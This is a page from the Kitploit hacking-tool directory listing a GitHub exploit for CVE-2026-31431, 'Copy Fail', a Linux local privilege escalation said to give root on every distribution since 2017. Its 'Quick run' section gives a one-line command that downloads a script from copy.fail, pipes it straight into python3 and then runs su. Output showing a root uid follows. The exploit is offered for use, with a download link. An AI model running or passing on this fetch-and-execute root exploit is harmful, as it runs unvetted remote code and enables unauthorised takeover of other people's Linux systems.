Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-31431-copy-fail — Exploit for CVE-2026-31431: a 732-byte Python script that exploits a straight-line logic flaw to gain root on all Linux distributions since 2017. | Kitploit
Tools/GitHubGitHub/ozergoker/cve-2026-31431-copy-fail
Privilege EscalationExploit FrameworksVulnerability AnalysisExploitationBinary Exploitation
GitHubozergoker/cve-2026-31431-copy-fail

CVE-2026-31431-copy-fail

Exploit for CVE-2026-31431: a 732-byte Python script that exploits a straight-line logic flaw to gain root on all Linux distributions since 2017.

View Repository

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
94 months agoNot yet reviewed

Copy Fail

Most Linux LPEs need a race window or a kernel-specific offset. Copy Fail is a straight-line logic flaw — it needs neither. The same 732-byte Python script roots every Linux distribution shipped since 2017.

Quick run:

curl https://copy.fail/exp | python3 && su
id
uid=0(root) gid=1002(user) groups=1002(user)

Download Tool